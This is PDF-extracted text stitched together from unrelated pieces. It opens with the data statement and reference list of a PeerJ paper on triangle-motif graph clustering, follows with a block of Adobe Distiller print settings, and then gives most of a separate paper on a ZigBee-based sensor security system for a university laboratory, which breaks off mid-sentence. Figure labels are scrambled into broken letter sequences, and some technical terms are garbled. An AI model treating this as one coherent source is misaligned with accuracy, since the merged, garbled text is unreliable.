https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: Data is available through the American Physical Society (APS) and Microsoft Academic Graph (MAG). Specifically: Facebook network data can be found here: http://snap.stanford.edu/data/ego-Facebook.html. Gemsec-Deezer network data can be found here: http://snap.stanford.edu/data/gemsec- Deezer.html. Code can be found here: https://github.com/yffre/COMICS. REFERENCES Bagrow JP. 2008. Evaluating local community methods in networks. Journal of Statistical Mechanics: Theory and Experiment 2008(05):P05001 DOI 10.1088/1742-5468/2008/05/p05001. Barjak F, Robinson S. 2008. International collaboration, mobility and team diversity in the life sciences: impact on research performance. Social Geography 3(1):23–36 DOI 10.5194/sg-3-23-2008. Benson AR, Gleich DF, Leskovec J. 2016. Higher-order organization of complex networks. Science 353(6295):163–166 DOI 10.1126/science.aad9029. Bian X, Zhang K. 2016. Modeling network with topic model and triangle motif. In: Ubiquitous Intelligence and Computing and 2015 IEEE International Conference on Autonomic and Trusted Computing and 2015 IEEE International Conference on Scalable Computing and Communications and ITS Associated Workshops, Piscataway: IEEE, 880–886. Bordons M, Gomez I, Fernández M, Zulueta M, Méndez A. 1996. Local, domestic and international scientific collaboration in biomedical research. Scientometrics 37(2):279–295 DOI 10.1007/BF02093625. Cai Q, Gong M, Ma L, Ruan S, Yuan F, Jiao L. 2015. Greedy discrete particle swarm optimization for large-scale social network clustering. Information Sciences 316:503–516 DOI 10.1016/j.ins.2014.09.041. Ding C, He X. 2004. K-means clustering via principal component analysis. In: Proceedings of the Twenty-First International Conference on Machine Learning. Banff, Alberta: ACM, 29. Du N, Wu B, Pei X, Wang B, Xu L. 2007. Community detection in large-scale social networks. In: Proceedings of the 9th WebKDD and 1st SNA-KDD 2007 Workshop on Web Mining and Social Network Analysis. New York: ACM, 16–25. Girvan M, Newman ME. 2002. Community structure in social and biological networks. Proceedings of the National Academy of Sciences of the United States of America 99(12):7821–7826. Gong M, Ma L, Zhang Q, Jiao L. 2012. Community detection in networks by using multiobjective evolutionary algorithm with decomposition. Physica A: Statistical Mechanics and Its Applications 391(15):4050–4060 DOI 10.1016/j.physa.2012.03.021. Halkidi M, Batistakis Y, Vazirgiannis M. 2002. Clustering validity checking methods: part ii. ACM SIGMOD Record 31(3):19–27 DOI 10.1145/601858.601862. Khan S, Liu X, Shakil KA, Alam M. 2017. A survey on scholarly data: from big data perspective. Information Processing & Management 53(4):923–944 DOI 10.1016/j.ipm.2017.03.006. Koll D, Li J, Fu X. 2013. With a little help from my friends: replica placement in decentralized online social networks. Technical Report TR-IFI-TB-2013-01, University of Goettingen, Germany. Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 20/22 http://snap.stanford.edu/data/ego-Facebook.html http://snap.stanford.edu/data/gemsec-Deezer.html http://snap.stanford.edu/data/gemsec-Deezer.html https://github.com/yffre/COMICS http://dx.doi.org/10.1088/1742-5468/2008/05/p05001 http://dx.doi.org/10.5194/sg-3-23-2008 http://dx.doi.org/10.1126/science.aad9029 http://dx.doi.org/10.1007/BF02093625 http://dx.doi.org/10.1016/j.ins.2014.09.041 http://dx.doi.org/10.1016/j.physa.2012.03.021 http://dx.doi.org/10.1145/601858.601862 http://dx.doi.org/10.1016/j.ipm.2017.03.006 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ Lee JR, Gharan SO, Trevisan L. 2014. Multiway spectral partitioning and higher-order cheeger inequalities. Journal of the ACM 61(6):1–30 DOI 10.1145/2665063. Leskovec J, Krevl A. 2014. SNAP Datasets: Stanford large network dataset collection. Available at http://snap.stanford.edu/data. Leskovec J, Lang KJ, Dasgupta A, Mahoney MW. 2009. Community structure in large networks: Natural cluster sizes and the absence of large well-defined clusters. Internet Mathematics 6(1):29–123 DOI 10.1080/15427951.2009.10129177. Li P, Chen K, Ge Y, Zhang K, Small M. 2017a. Bipartite centrality diffusion: mining higher-order network structures via motif-vertex interactions. EPL (Europhysics Letters) 120(2):28003 DOI 10.1209/0295-5075/120/28003. Li P, Dau H, Puleo G, Milenkovic O. 2017b. Motif clustering and overlapping clustering for social network analysis. In: IEEE INFOCOM 2017—IEEE Conference on Computer Communications, Piscataway: IEEE, 1–9 DOI 10.1109/INFOCOM.2017.8056956. Li Z, Liu J. 2016. A multi-agent genetic algorithm for community detection in complex networks. Physica A: Statistical Mechanics and Its Applications 449:336–347. Li P, Milenkovic O. 2017. Inhomogeneous hypergraph clustering with applications. In: Guyon I, Luxburg UV, Bengio S, Wallach H, Fergus R, Vishwanathan S, Garnett R, eds. Advances in Neural Information Processing Systems 30. Long Beach: Curran Associates, Inc., 2308–2318. Li P, Milenkovic O. 2018. Submodular hypergraphs: p-Laplacians, cheeger inequalities and spectral clustering. arXiv e-prints. Louis A. 2015. Hypergraph markov operators, eigenvalues and approximation algorithms. In: Proceedings of the Forty-Seventh Annual ACM Symposium on Theory of Computing, STOC ‘15. New York: ACM, 713–722. Lu Z, Wu W, Chen W, Zhong J, Bi Y, Gao Z. 2013. The maximum community partition problem in networks. Discrete Mathematics, Algorithms and Applications 5(4):1350031 DOI 10.1142/s1793830913500316. Luo F, Wang JZ, Promislow E. 2008. Exploring local community structures in large networks. Web Intelligence and Agent Systems: An International Journal 6(4):387–400. Ma L, Huang H, He Q, Chiew K, Liu Z. 2014. Toward seed-insensitive solutions to local community detection. Journal of Intelligent Information Systems 43(1):183–203 DOI 10.1007/s10844-014-0315-6. Milo R, Shen-Orr S, Itzkovitz S, Kashtan N, Chklovskii D, Alon U. 2002. Network motifs: simple building blocks of complex networks. Science 298(5594):824–827 DOI 10.1126/science.298.5594.824. Monti F, Otness K, Bronstein MM. 2018. Motifnet: A motif-based graph convolutional network for directed graphs. arXiv Preprint DOI 10.1109/DSW.2018.8439897. Newman ME. 2006. Modularity and community structure in networks. Proceedings of the National Academy of Sciences of the United States of America 103(23):8577–8582 DOI 10.1073/pnas.0601602103. Ning Z, Dong P, Kong X, Xia F. 2018. A cooperative partial computation offloading scheme for mobile edge computing enabled internet of things. IEEE Internet of Things Journal 1 DOI 10.1109/JIOT.2018.2868616. Ning Z, Huang J, Wang X. 2019. Vehicular fog computing: enabling real-time traffic management for smart cities. IEEE Wireless Communications 26(1):87–93 DOI 10.1109/MWC.2019.1700441. Ning Z, Kong X, Xia F, Hou W, Wang X. 2019a. Green and sustainable cloud of things: enabling collaborative edge computing. IEEE Communications Magazine 57(1):72–78 DOI 10.1109/MCOM.2018.1700895. Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 21/22 http://dx.doi.org/10.1145/2665063 http://snap.stanford.edu/data http://dx.doi.org/10.1080/15427951.2009.10129177 http://dx.doi.org/10.1209/0295-5075/120/28003 http://dx.doi.org/10.1109/INFOCOM.2017.8056956 http://dx.doi.org/10.1142/s1793830913500316 http://dx.doi.org/10.1007/s10844-014-0315-6 http://dx.doi.org/10.1126/science.298.5594.824 http://dx.doi.org/10.1109/DSW.2018.8439897 http://dx.doi.org/10.1073/pnas.0601602103 http://dx.doi.org/10.1109/JIOT.2018.2868616 http://dx.doi.org/10.1109/MWC.2019.1700441 http://dx.doi.org/10.1109/MCOM.2018.1700895 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ Ning Z, Wang X, Rodrigues J, Xia F. 2019b. Joint computation offloading, power allocation, and channel assignment for 5G-enabled traffic management systems. IEEE Transactions on Industrial Informatics 1 DOI 10.1109/TII.2019.2892767. Ning Z, Xia F, Ullah N, Kong X, Hu X. 2017. Vehicular social networks: enabling smart mobility. IEEE Communications Magazine 55(5):16–55 DOI 10.1109/mcom.2017.1600263s. Pizzuti C. 2012. A multiobjective genetic algorithm to find communities in complex networks. IEEE Transactions on Evolutionary Computation 16(3):418–430 DOI 10.1109/tevc.2011.2161090. Reyes-Gonzalez L, Gonzalez-Brambila CN, Veloso F. 2016. Using co-authorship and citation analysis to identify research groups: a new way to assess performance. Scientometrics 108(3):1171–1191 DOI 10.1007/s11192-016-2029-8. Ribeiro P, Silva F, Kaiser M. 2009. Strategies for network motifs discovery. In: E-Science, 2009. e-Science’09. Fifth IEEE International Conference. Piscataway: IEEE, 80–87. Rozemberczki B, Davies R, Sarkar R, Sutton C. 2018. Gemsec: graph embedding with self clustering. Available at http://arxiv.org/abs/1802.03997. Schaeffer SE. 2007. Graph clustering. Computer Science Review 1(1):27–64 DOI 10.1016/j.cosrev.2007.05.001. Shervashidze N, Vishwanathan S, Petri T, Mehlhorn K, Borgwardt K. 2009. Efficient graphlet kernels for large graph comparison. In: Artificial Intelligence and Statistics, Clearwater Beach, Florida, USA, 488–495. Shi C, Li Y, Zhang J, Sun Y, Philip SY. 2017. A survey of heterogeneous information network analysis. IEEE Transactions on Knowledge and Data Engineering 29(1):17–37. Stoer M, Wagner F. 1997. A simple min-cut algorithm. Journal of the ACM 44(4):585–591 DOI 10.1145/263867.263872. Wang X, Ning Z, Hu X, Ngai EC-H, Wang L, Hu B, Kwok RYK. 2018a. A city-wide real-time traffic management system: enabling crowdsensing in social internet of vehicles. IEEE Communications Magazine 56(9):19–25 DOI 10.1109/MCOM.2018.1701065. Wang X, Ning Z, Zhou M, Hu X, Wang L, Zhang Y, Richard Yu F, Hu B. 2018b. Privacy- preserving content dissemination for vehicular social networks: challenges and solutions. IEEE Communications Surveys & Tutorials 1 DOI 10.1109/COMST.2018.2882064. Wang X, Ning Z, Hu X, Wang L, Hu B, Cheng J, Leung VCM. 2019. Optimizing content dissemination for real-time traffic management in large-scale internet of vehicle systems. IEEE Transactions on Vehicular Technology 68(2):1093–1105 DOI 10.1109/TVT.2018.2886010. Wegner AE. 2014. Subgraph covers: an information-theoretic approach to motif analysis in networks. Physical Review X 4(4):041026 DOI 10.1103/physrevx.4.041026. Xia F, Wang W, Bekele TM, Liu H. 2017. Big scholarly data: a survey. IEEE Transactions on Big Data 3(1):18–35 DOI 10.1109/tbdata.2016.2641460. Yan X, Han J. 2002. gspan: Graph-based substructure pattern mining. In: Data Mining, 2002. ICDM 2003. Proceedings 2002 IEEE International Conference. Maebashi: IEEE, 721–724. Yin H, Benson AR, Leskovec J, Gleich DF. 2017. Local higher-order graph clustering. Proceedings of the 23rd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. ACM, 555–564. Zhou D, Huang J, Schölkopf B. 2006. Learning with hypergraphs: clustering, classification, and embedding. In: International Conference on Neural Information Processing Systems, Canada, Vol. 19, 1601–1608. Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 22/22 http://dx.doi.org/10.1109/TII.2019.2892767 http://dx.doi.org/10.1109/mcom.2017.1600263s http://dx.doi.org/10.1109/tevc.2011.2161090 http://dx.doi.org/10.1007/s11192-016-2029-8 http://arxiv.org/abs/1802.03997 http://dx.doi.org/10.1016/j.cosrev.2007.05.001 http://dx.doi.org/10.1145/263867.263872 http://dx.doi.org/10.1109/MCOM.2018.1701065 http://dx.doi.org/10.1109/COMST.2018.2882064 http://dx.doi.org/10.1109/TVT.2018.2886010 http://dx.doi.org/10.1103/physrevx.4.041026 http://dx.doi.org/10.1109/tbdata.2016.2641460 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ COMICS: a community property-based triangle motif clustering scheme Introduction Related Work Experiments Results and Discussion Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_6jll4ersjfbzpo2ra3sito2ydi ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 DOI: 10.21307/ijanmc-2020-015 39 Design and Research of Security System in University Laboratory Ding Li School of Health Services Management Xi’an Medical University, Xi’an, Shaanxi, China E-mail: dingli@xiyi.edu.cn Shi Xuerong School of Health Services Management Xi’an Medical University, Xi’an, Shaanxi, China E-mail: 39480919@qq.com Zhang Dujuan School of Health Services Management Xi’an Medical University, Xi’an, Shaanxi, China E-mail: ZhangDj1981sx@162.com Su Yulei School of Health Services Management Xi’an Medical University, Xi’an, Shaanxi, China E-mail: 541952030@qq.com Abstract—The laboratory is an important place for teaching and scientific research in major universities, and plays an important role in the work of universities. The resources equipped by the laboratory occupy a large part of the resources of the entire school. The laboratory security system plays an important role in ensuring the safety of the laboratory and preventing the loss of equipment. Today's laboratory security systems have factors such as low automation, insufficient management, and inadequate safety in the experimental environment. Moreover, most security systems are built using wired methods, which have problems such as cumbersome wiring, aging lines, and difficult maintenance. In view of the many problems in the current laboratory management, this paper proposes a security system designed and implemented by the ZigBee technology of the Internet of Things. The system uses a wireless network to monitor laboratory access control and the environment, realizing the intelligence of the laboratory security system. Keyword-Internet of Things (IoT); Sensor; Security I. INTRODUCTION In the field of security, with the diversification of networking methods, hardware and software platforms and application technologies, the implementation of security systems has become more and more diverse. At present, the laboratory security system has a large number of alarm constraints and redundancy, and poor real-time monitoring. In response to this series of problems, this paper uses the Internet of Things and other related technologies to carry out research work on the laboratory security system design, and proposes a set Networked laboratory security system. The system uses sensor design nodes to form a ZigBee wireless sensor network to realize the collection of environmental information in the laboratory, thereby automatically monitoring the occurrence of some security risks. II. IOT TECHNOLOGY Internet of Things (abbreviation: IoT) originated in the media field and is the third revolution of the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 40 information technology industry[1]. The Internet of Things refers to connecting any object with the network through information sensing equipment according to the agreed protocol, and the objects exchange information and communicates, through the information transmission medium to achieve intelligent identification, positioning, tracking, supervision and other functions. There are two key technologies in IoT applications, namely sensor technology and embedded technology[2]. Unlike traditional networks, the terminal of the Internet of Things technology is no longer a PC, and its terminal is an embedded computer system and its supporting sensors. The Internet of Things technology is widely used in industrial, medical, transportation and other fields. III. NETWORK TOPOLOGY A typical ZigBee network supports three topologies, namely a star network topology, a tree network topology, and a mesh network topology. The star network topology is composed of a network main coordinator and multiple terminal equipment nodes. The main coordinator node is an FFD device. In a star topology, each terminal node can only communicate with the coordinator node, and each terminal node cannot transmit data. The tree topology is composed of a network coordinator and multiple terminal equipment nodes and routing nodes. The main coordinator and the routing node can have their own child nodes, and the terminal device node can autonomously choose to join the coordinator or the router node. The tree structure follows the order of parent node and child node, that is, each terminal node has its fixed parent node, which must be passed through the parent node layer by layer. The advantage of this topology is that the network coverage is large, but if one of the parent nodes is damaged, all the child nodes connected to it will be unable to communicate. The mesh topology is also composed of a coordinator node, multiple terminal device nodes and router nodes. This structure is different from the tree network structure in that all routing nodes can communicate with each other, and there is no strict communication sequence. When a routing node fails, data can be transmitted through other routing nodes. This topology not only reduces the delay of information transmission, but also improves the routing efficiency and reliability. Through the corresponding routing algorithm, the best path can be found. According to the current status of the laboratory, the range of experiments that need to be monitored is large, and the types of data monitored are many. From a practical point of view, the wireless network that needs to be established can dynamically delete and add nodes at any time. According to these characteristics, choosing a mesh topology is more suitable for the current laboratory system. The mesh topology has a strong stability and has a strong advantage in a large-scale laboratory monitoring system. IV. STRUCTURE DESIGN OF LABORATORY SECURITY SYSTEM The laboratory security system mainly relies on the monitoring of the laboratory environment to determine potential safety hazards or the presence of suspicious persons[3]. Various types of sensors are arranged in the monitoring range. These sensors are connected to the terminal nodes and placed in different locations in the laboratory. The system uses infrared sensors to monitor whether there are people in the room, door magnetic sensors to detect whether someone breaks into the window, smoke and temperature sensors to detect the presence of fire in the laboratory, and harmful gas sensors to detect the leakage of pharmaceutical reagents. When an abnormality occurs, the sensor in the detection unit will send out an alarm signal, and the alarm signal will be transmitted through the communication unit to the monitoring center software via the ZigBee network. The structure of the laboratory security system is shown in Figure 1. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 41 Sensor node Routing node Laboratory monitoring area Coordinator node PC ZigBee Figure 1. Laboratory security system structure V. SYSTEM HARDWARE DESIGN A. Monitoring unit design The detection unit is mainly composed of an infrared sensor, a door magnetic sensor, a smoke sensor, a temperature sensor, a harmful gas and a combustible gas sensor module. The infrared sensor is mainly used to detect whether there are outsiders in the laboratory. The system uses a pyro electric infrared sensor, which mainly detects the infrared radiation radiated by the human body in a non-contact manner to determine whether someone is in the surveillance area. This system uses the human body infrared sensor module HC-SR501. This module is fully automatic. When someone enters the sensing range, the module will automatically output high level. If it can always feel the presence of the person, it will always output high level. ，After detecting the existence of human, it will switch from output high level to output low level. The wireless door magnetic sensor is a device commonly used in security systems, mainly used to detect whether the doors and windows are opened or closed illegally. When the wireless door sensor collects the signal that the door sensor is open, it sends an alarm signal. The combustible gas sensor is a detector used to detect the combustible gas content in the air. The system uses the MQ-9 sensor to measure the combustible gas concentration[4]. When the sensor detects that the combustible gas content in the air reaches or exceeds the threshold, it sends an alarm signal. The temperature sensor adopts DS18B20 digital sensor, which is small in size and easy to use. The interface mode is single wire, which can realize the networking function of multiple sensors. The harmful gas sensor module minds the effective detection of many gases such as ammonia, sulfide, methane, and carbon monoxide. The MQ135 sensor is used for the detection of harmful gas content[5]. B. Communication unit design The communication unit is mainly responsible for data transmission in the wireless sensor network environment monitoring system, which is the core part of the entire system. Data is transmitted through a large number of wireless sensor network nodes arranged in the network. The mutual communication between the various nodes realizes the communication of the entire network and forms the communication unit of the system. The node structure designed in the wireless International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 42 sensor network is shown in Figure 2. It is mainly composed of three parts: wireless node module, sensor module and power intelligent main board. Power motherboard C C 2 5 3 0 W ire le ss in te rfa ce in te rfa ce Single chip microcomputer se n so r R S 2 3 2 Sensor module M ic ro c o n tro lle r Figure 2. Wireless sensor network node The microcontroller in the sensor module selects STC89C52RC produced by STC. The controller has the characteristics of high speed and low power consumption. It uses an enhanced 51 core, the calculation speed is higher than the ordinary 8051. The controller can wake up the idle mode at any time to reduce power consumption and ensure that the end node power supply is used for a longer time. The wireless node module selects CC2530 chip as the microcontroller of the module. The CC2530 chip is compatible with various ZigBee standards, and has the characteristics of stable performance, low power consumption, and strong anti-interference ability[6]. The sensor module is arranged in the monitoring environment and is responsible for data collection and transmission in different areas, and transmits the collected data information to the coordinator. If it cannot be directly transmitted, it is transmitted to the coordinator in a multi-hop manner. The design part of the power module chooses to use an input voltage of 9v, and the microcontroller and various sensors on the front-end measurement version use a 5v power supply[7]. The ZigBee module CC2530 uses a 3.3V power supply, so the system uses a 7805 voltage regulator to convert the 9V voltage It is 5V voltage. At the same time, the 5V voltage is reduced to 3.3V through the 1117 voltage regulator tube, which is used to provide power for the ZigBee module. VI. SYSTEM SOFTWARE DESIGN ZigBee is a wireless transmission technology based on the IE802.15.4 standard specification[8]. It has the characteristics of self-organizing network, low cost, low power consumption, and enemy complexity [9]. It does not need to apply for authorization for the working frequency band, which is convenient and cost-effective to use. The system uses ZigBee to develop a set of wireless sensor networks according to the actual monitoring needs in the laboratory, and the data transmission between the nodes in the network is transmitted using the ZigBee protocol. The laboratory monitoring system mainly includes terminal node coordinator, terminal node and routing node. The coordinator is responsible for forming a network, collecting data, and providing an interface with a computer to realize the formation of a sensor network and the establishment of a data transmission channel. The terminal node is responsible for collecting data information in the laboratory, including temperature, smoke, and harmful gases. These data are processed by the microcontroller, transmitted to the ZigBee network via the wireless network module, and finally transmitted to the coordinator, which is then transmitted to the monitoring center to realize the collection and transmission of laboratory environmental data. The routing node is responsible for the signal enhancement and forwarding of the data. Because the monitoring area is large, some data may be lost during the transmission process. To avoid this situation, a routing node is designed in the network to enhance and forward the data signal. , To ensure the stability and accuracy of data transmission throughout the network.. A. Terminal node design 1) Design of sensor data acquisition module International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 43 The system data acquisition module uses 51-microcontroller, through C language programming, to achieve sensor status and data acquisition, judgment and so on. These data are sent to the wireless network through the ZigBee module and transmitted to the coordinator. The flow chart of the sensor data acquisition module software design is shown in Figure 3. Get command Data collection Determine whether the test command is received Cyclic detection of sensor data Determine if there is an exception Send to coordinator or router End Start No Yes No Obtain Yes Figure 3. Software design flow chart of information collection module After the data acquisition module software is running, it reads the background from the serial port of the ZigBee module to obtain background commands, collects the status of the sensors connected to the module, and sends the data to the network. If there is no background acquisition command, the program cyclically executes the acquisition sensor status command, and judges whether there is an abnormal situation in the laboratory through the sensor status data. If abnormal data appears, send laboratory status data to the monitoring center, and if there is no abnormality, continue to collect laboratory sensor data. 2) Wireless network module design The information collected by each terminal node in this system is different. According to different sensors, multiple data will be collected within the scope of laboratory monitoring. In order to realize the data transmission in the system, it is necessary to establish a network and add these terminal nodes to it. In this system, the terminal node sends a request to join the network to the coordinator. The coordinator determines whether to allow joining according to the situation, responds to the request and sends it to the terminal node, so as to join the network and perform data transmission. The flow chart is shown in Figure 4. Initialization Send a signal to join the network Is it successful to join the network? Start Data collection Yes Whether an alarm signal is detected Send alarm information Yes No No Figure 4. End node flow chart International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 44 The terminal node first finds the coordinator node in the network, and scans again if it is not found until it is found. Then send the association request command, wait for the coordinator to process, if you agree, then join the network, and get a short 16-bit address assigned, the terminal node sends data to the coordinator through the network. B. Coordinator node design The main role of the coordinator is to create the entire network and serve as a bridge between the terminal nodes and the control center. It needs to receive all kinds of data collected by terminal nodes and routing nodes through ZigBee wireless communication protocol, and then send it to the monitoring center. In the entire system, the coordinator must be a full-function device, and there can only be one coordinator node in a network, so the coordinator initialization setting is required at the time of design. The flow chart is shown in Figure 5. The coordinator in the network is responsible for constructing the entire network, and adopts the method of ad hoc network to construct. 1) Determine network coordinator The process is to determine whether the node is an FFD node, and then to determine whether the FFD node is in another network or whether a coordinator already exists in the network[9]. Through active scanning, send a beacon request command, and then set a T_scan_duration, if no beacon is detected within the scanning period, then it is considered that FFD does not have a coordinator in the entire network, it can build your own ZigBee network, and as this The network coordinator continuously generates beacons and broadcasts them. 2) Carry out the channel scanning process It includes two processes: energy scanning and active scanning. First, perform energy detection on the specified channel or the default channel to avoid possible interference. Then carry out active scanning to search for network information within the communication radius of the node. This information is broadcast on the network in the form of beacon frames. The node obtains these beacon frames through active channel scanning, and then selects a suitable channel based on this information. Initialization Create a new network Display network information Enter the wireless monitoring state Is there an application signal? Whether there is an alarm signal? No Send an alarm signal Yes Assign Network Number Yes No Figure 5. Coordinator node program flow chart 3) Set the network ID After finding a suitable channel, the coordinator will select a network identifier (PAN ID) for the network. There are two address modes in the ZigBee network: extended address (64-bit) and short address (16-bit), where the extended address is assigned by the IEEE organization and is used for unique device identification. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 45 After the above steps are completed, the ZigBee mesh network is successfully initialized, and then waits for other nodes to join. After the node successfully joins the network, it will get a short network address and send and receive data through this address. The flow chart of ad hoc network is shown in Figure 6. Initialization Set PANID and channel Build a network and allow to join Wait for the node to join Whether the node joins the network? Yes No Receive data Start Figure 6. Coordinator ad hoc network flow chart C. Design of routing nodes As a relay node of the entire detection system, routing nodes are suitable for environmental monitoring in a large area. In wireless sensor networks, it may not be possible to connect and communicate because of the long distance between nodes. At this time, the routing node acts as a relay station to connect the terminal node and the coordinator. When setting up a routing node, you need to first initialize the CC2530 device and protocol stack, send a signal to join the network, the front-end coordinator will respond accordingly, agree to join the network, and assign a network address. After the routing node joins the network, it starts the function of data forwarding, thereby ensuring the transmission of data throughout the network. The program flow Figure 7 is shown. Initialization Join the network Enter the wireless monitoring state Determine the signal received Forward to next node No Assign addresses to nodes Yes Signals to join the network Alarm Figure 7. Routing node flow chart VII. COMMUNICATION PROTOCOL DESIGN Communication protocol refers to the rules and conventions that both entities must follow to complete communication or services. The protocol defines the format used by the data unit, the information and meaning that the information unit should contain, the connection method, and the timing of information transmission and reception, so as to ensure that the data in the network is smoothly transmitted to the determined place. This system uses wireless communication, a specific communication rule designed for communication in the formulation of protocols. In the formulation of the transmission module protocol, according to the ZigBee communication protocol and the needs of the actual system, the communication protocol of this system was formulated. The single transmission format is shown in Table 1. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 46 TABLE I. TRANSMISSION DATA FORMAT FD indicates that ZigBee sends data point to point, and the length indicates the total length of the piece of data. This length can determine how many bits of data need to be read, which is convenient for taking out the data. The target address stores the ZigBee address of the received information. The following data 1 represents the laboratory number, data 2, 3, 4 and so on represent the data collected by the sensor. Each node sets different data according to its sensor. The single data receiving format is shown in Table 2. TABLE II. TRANSMISSION DATA FORMAT FD means ZigBee point-to-point transmission. The length represents the total length of the data, and the target address represents the ZigBee address of the received message, that is, the node address to which the data needs to be sent. Data 1 represents the laboratory number. Data 2 represents the data information received by the sensor. Data 3 and data 4 are also the information received by the sensor. The amount of this information depends on the number of sensors at the terminal node. The source address represents the ZigBee address of the sent message, that is, from which node the message was received. VIII. CONCLUSION The laboratory security monitoring system mainly monitors the environment 